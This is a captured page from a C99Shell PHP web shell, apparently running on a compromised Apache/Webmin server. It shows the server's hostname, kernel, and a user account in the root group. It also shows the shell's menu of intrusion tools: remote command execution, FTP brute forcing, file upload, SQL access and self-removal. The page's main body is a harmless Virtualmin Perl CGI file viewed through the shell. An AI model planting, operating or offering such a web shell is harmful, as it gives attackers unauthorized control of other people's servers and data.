!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/usr/share/webmin/virtual-server/   drwxrwxr-x
Free 28.64 GB of 117.98 GB (24.28%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     edit_newsharedips.cgi (1.61 KB)      -rwxrwxr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show a page for entering possible shared IP addresses

require './virtual-server-lib.pl';
&can_edit_templates() || &error($text{'sharedips_ecannot'});
&ui_print_header(undef, $text{'sharedips_title'}, "", "sharedips");

print "$text{'sharedips_desc'}<p>\n";
print &ui_form_start("save_newsharedips.cgi", "post");
print &ui_table_start($text{'sharedips_header'}, undef, 2);

# Current default IP
print &ui_table_row($text{'sharedips_def'},
            &get_default_ip());

if (defined(&list_resellers)) {
    # Shared IPs owned by resellers
    foreach $r (&list_resellers()) {
        if ($r->{'acl'}->{'defip'}) {
            push(@rips, "<tt>$r->{'acl'}->{'defip'}</tt> ".
                    "($r->{'name'})");
            }
        }
    if (@rips) {
        print &ui_table_row($text{'sharedips_rips'},
                    join("<br>\n", @rips));
        }
    }

# Other possible shared IPs for regular servers
print &ui_table_row($text{'sharedips_ips'},
            &ui_textarea("ips", join("\n", &list_shared_ips()),
                 5, 20));

# Allocate a new one from the default template
$tmpl = &get_template(&get_init_template(0));
if ($tmpl->{'ranges'}) {
    print &ui_table_row(" ",
        &ui_checkbox("alloc", 1, $text{'sharedips_alloc'}, 0));
    }

if (&supports_ip6()) {
    # Default IPv6 address
    print &ui_table_row($text{'sharedips_def6'},
            &get_default_ip6() || "<i>$text{'sharedips_def6none'}</i>");

    # Other possible shared IPv6 addressses for regular servers
    print &ui_table_row($text{'sharedips_ip6s'},
            &ui_textarea("ip6s", join("\n", &list_shared_ip6s()),
                 5, 40));
    }

print &ui_table_end();
print &ui_form_end([ [ "ok", $text{'sharedips_ok'} ] ]);

&ui_print_footer("", $text{'index_return'});

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0041 ]--